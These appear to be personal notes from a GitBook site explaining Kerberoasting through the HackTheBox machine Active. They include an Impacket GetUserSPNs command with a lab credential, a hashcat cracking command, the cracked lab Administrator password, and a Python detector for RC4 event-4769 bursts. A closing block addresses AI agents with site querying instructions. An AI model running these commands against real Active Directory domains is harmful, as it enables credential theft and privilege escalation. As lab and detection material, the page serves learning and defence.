# Kerberoasting (Cleanin)

### What is Kerberoasting?

In the Kerberos authentication flow, this is what happens when a client sends a TGS-REQ:

When a user wants to access a service, they send a TGS-REQ to the TGS containing their TGT and the SPN of the service they want. The TGS validates the TGT and hands back a service ticket encrypted with a key derived from the service account's password (its password hash). The user receives this ticket and presents it to the service.

Here's the thing: **the KDC never checks whether you actually need access to that service.** Any authenticated domain user can request a service ticket for any SPN registered in the domain. The KDC just hands it out, and you get to keep that ticket.

The service ticket is encrypted with the service account's hash. You have the ticket, and the ciphertext keyed by that hash is inside it. Take it offline and crack it: this is what Kerberoasting is.

Any authenticated user (including low-privilege accounts) can request a TGS for a specific SPN.

Example on the HTB machine Active:

Password:

```
GPPstillStandingStrong2k18
```

User:

```
active.htb\SVC_TGS
```

The Impacket tool GetUserSPNs.py (it needs valid domain credentials) lists accounts with SPNs and, with `-request`, requests a TGS for each of them:

```
GetUserSPNs.py -request -dc-ip 10.129.209.209 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 00:36:40.351723  2026-04-18 04:58:23.354942

[-] CCache file is not found. Skipping...
```

```
## hashcat, mode 13100 = Kerberos 5 TGS-REP etype 23 (RC4-HMAC)
hashcat -m 13100 -a 0 hash /wordlists/rockyou.txt --force
```

Result:

```
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$7ecc20df66221ea1785c0d6803b34882$…:Ticketmaster1968
```

User and password:

```
administrator:Ticketmaster1968
```

Kerberoasting abuses a design characteristic of Kerberos: service tickets are encrypted with the service account's credentials, so weak or poorly managed service account passwords are what make the attack practical.

* If the service account password is weak → it gets cracked quickly
* **Service accounts often have high privileges**
* **Passwords may be static for years** (unlike user accounts)
* **Older encryption types** (like RC4) make cracking easier
* Large number of SPNs increases attack surface
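The flip side of the RC4 point above is that it is also what makes the attack visible to defenders: a single account pulling RC4-encrypted service tickets for many SPNs in a short burst is the classic Kerberoasting signature in Windows Security event 4769. The script below is an added example, not part of the original notes or of Impacket; the 4769 field names and the etype code 0x17 are real, while the log lines, the CORP.EXAMPLE domain and the host names are constructed.

```python
# Added example (not from the original notes): flag Kerberoasting-style bursts
# in Windows Security event 4769 "A Kerberos service ticket was requested".
# Event 4769 and etype 0x17 (RC4-HMAC, the 23 in $krb5tgs$23$) are real; the
# log lines below are constructed sample data.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"

# Constructed 4769 events rendered as key=value fields, one event per line.
SAMPLE_LOG = """\
time=2026-04-18T04:58:01 TargetUserName=SVC_TGS@CORP.EXAMPLE ServiceName=active/CIFS:445 TicketEncryptionType=0x17
time=2026-04-18T04:58:02 TargetUserName=SVC_TGS@CORP.EXAMPLE ServiceName=MSSQLSvc/sql01.corp.example:1433 TicketEncryptionType=0x17
time=2026-04-18T04:58:02 TargetUserName=SVC_TGS@CORP.EXAMPLE ServiceName=HTTP/web01.corp.example TicketEncryptionType=0x17
time=2026-04-18T04:58:03 TargetUserName=SVC_TGS@CORP.EXAMPLE ServiceName=ldap/dc01.corp.example TicketEncryptionType=0x17
time=2026-04-18T04:30:00 TargetUserName=jdoe@CORP.EXAMPLE ServiceName=cifs/fs01.corp.example TicketEncryptionType=0x12
time=2026-04-18T04:58:05 TargetUserName=WS01$@CORP.EXAMPLE ServiceName=ldap/dc01.corp.example TicketEncryptionType=0x17
"""

def parse_4769(text):
    """One dict per non-empty line; the 'time' field becomes a datetime."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = dict(kv.split("=", 1) for kv in line.split())
            ev["time"] = datetime.fromisoformat(ev["time"])
            events.append(ev)
    return events

def detect_kerberoast(events, window=timedelta(minutes=5), min_spns=3):
    """Return {requester: sorted SPNs} for accounts that obtain RC4 service
    tickets for >= min_spns distinct SPNs inside `window`. Machine accounts
    ($) and krbtgt tickets are skipped, the usual tuning to drop benign noise."""
    by_user = defaultdict(list)
    for ev in events:
        user, spn = ev["TargetUserName"].split("@")[0], ev["ServiceName"]
        if user.endswith("$") or spn.lower().startswith("krbtgt"):
            continue
        if ev["TicketEncryptionType"].lower() == RC4_HMAC:
            by_user[user].append((ev["time"], spn))
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # slide the window from each request
            spns = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(spns) >= min_spns:
                hits[user] = sorted(spns)
                break
    return hits
```

On the sample data only SVC_TGS is flagged: jdoe's AES (0x12) requests and the WS01$ machine account are filtered out, which is exactly the noise that makes a naive "count 4769 events" rule useless.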


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kaizoku.gitbook.io/notes/active-directory/kerberoasting-cleanin.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
